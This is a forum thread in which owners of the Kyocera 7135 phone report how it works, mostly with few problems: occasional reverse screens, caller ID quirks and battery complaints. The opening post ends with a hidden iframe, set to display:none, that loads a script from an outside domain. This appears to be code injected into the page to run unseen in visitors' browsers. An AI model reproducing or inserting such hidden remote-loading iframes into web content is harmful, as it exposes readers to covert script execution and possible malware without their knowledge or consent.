+ Reply to Thread
Page 1 of 2 1 2 LastLast

Those who've had NO problems, report in ...

Please post here if you've had no problems with your 7135.

Here's an example (my situation):

"No problems. Had phone 3 weeks. QNC only, some third party apps installed. Haven't used SD card at all yet. On Verizon in Northern California."

Now come on, don't view this thread with your phone working fine and NOT post --- it'll be bad kharma.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

As far as I'm concerned, my phone works fine. That doesn't mean zero problems. But I've had no persistent problems.

No problems here. Heavy SD user, MP3 user, Kinoma user, Tealmovie, OmniRemote, etc. I'm simply a satisfied customer.

Mine works fine except for if I leave my pre-programmed SD Rand McNally road atlas in and occasionally it locks up if password protection is on. Otherwise no problems at all.
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Same here. No serious problems. Caller ID fine, no contrast problems, reception good. A few reverse screens related to a sd card program and one black screen of death, though I think I now know the external cause. Day-to-day, no problems.

Everything works well...

Mine is working perfectly, but I think most of you would expect no less from me

I ahve however seen DateBk5 case a fatal reset error when clciking out of a appointment sometimes. Kinda weird.

Next up 55mHz OC'ed

Had mine for about 5 weeks. Only 2 reverse screens which only required a soft reset. I have a few 3rd party apps but mainly using the out of the box config for now. I have used the mp3 player moderately and loaded through a dazzle reader and not the loader provided. I do get occasional slow response times but most of the time it works fine. I get the CID problem primarily in NYC not in my home area of NJ. I also have had some missed calls and much more signal strength variation than my old startac. I get a "searching" message when digital signal drops out so I don't know if it will really go to analog even though I have automatic selected. Bottom line - This is the best convergance device that I could have hoped for...extremely happy so far...

I have had three reverse screens over the 6 weeks I've had the phone. A simple soft reset fixed it and I was back up with no further problems.

I would say that I've had no more problems than I did with my palm m505 when I first got it.
    If at first you don't succeed, don't try sky diving.

It's great to hear the positive feedback everybody! Now if I can just get some of that from Fedex today!
    Please visit my picture site: Robert-O-Rama :)

I have had minimal problems. One reverse screen and a couple of other minor glitches. The way I see it, if you want to ride the bleeding edge, you need to be willing to get a little bloody. I am sure that the issues people are seeing will be resolved when Verizon carries the phone and can flash upgrade our units.

Alan

My phone is working fine. Except for one incident with a Facer skin that it did not like and another one with Easy calc which needed a reset, it's been smooth sailing so far. (We need a graphic showing fingers crossed.)

No real problems here for the last 4 weeks. I have had a few reverse screens (mainly testing different programs) I had to do 2 hard resets and both from problimatic programs, I use SD card, EN, and lots of palm applications and heavy phone usage and no issues. My only gripe is keypad ilumination stinks and sometimes does not respond to key presses when in voice mail systems trying to press buttons. Other than that very happy!!

Originally posted by alanb
    The way I see it, if you want to ride the bleeding edge, you need to be willing to get a little bloody.
    I have had ZERO problems to this point... because the snow delayed my 7135 until TOMORROW! If I don't get it tomorrow somebody is going to be "bloody"... and it'll be all over his freaking fedex uniform! (j/k )

Over a month, and no problems here.
    Battery life is still improving -- If I extend the antenna while sitting at work, it will still read at full charge at night even with a couple of calls, some Tetris and use of the datebook, memo and a little MP3.

"The way I see it, if you want to ride the bleeding edge, you need to be willing to get a little bloody. I am sure that the issues people are seeing will be resolved when Verizon carries the phone and can flash upgrade our units. "

Well put-- I think this is right on target. I'm on my third unit (1st two with hardware problems). Overall, it works great. My only "major" complaint at this point is that sometimes, when opening the clamshell, the unit is frozen for a few seconds before responding to any buttons or input. Again, my hope is this will get fixed with a firmware upgrade (or if not, yet another return?). That said, it's really great to have everything integrated in one unit...

6 weeks in and almost no problems...
    1. a few reverse screens all due to add-on software.
    2. a hardware problem with my first 7135 requiring a replacement so I could sync by pressing the button. I could sync through the Palm app so that wasn't a show-stopper.
    This is nothing in comparison to earlier Palms I've had so I'm happy.

No problems hear

I'm an early adaptor - got my phone in December. No problems with the phone except for the contrast reset issue discussed. I am a heavy datebook, contact list, MP3 player, and phone user. Don't see the need to use the other applications - not interested in viewing pictures or any of the other PDA applications that I believe create all the problems with these phones.

My only issue to date is with the battery - I'm not getting anywhere near the advirtised life and I'm always in a digital location. I'm lucky to get an hour of talk time - I need to charge my phone every day - somedays I can't make it to the end of the day.
    pvm

Originally posted by Robert K.
    I have had ZERO problems to this point... because the snow delayed my 7135 until TOMORROW! If I don't get it tomorrow somebody is going to be "bloody"... and it'll be all over his freaking fedex uniform! (j/k )
    Hey Robert K., isn't your treo keeping you warm under all that snow?
    If at first you don't succeed, don't try sky diving.

Originally posted by Steve B.
    Hey Robert K., isn't your treo keeping you warm under all that snow?
    No.... not really. But, it did come in handy this morning for chipping some ice off of my windshield (j/k... I think it's going on e-bay in the next few days. I'm not going to worry about it until I get my 7135 fully operational )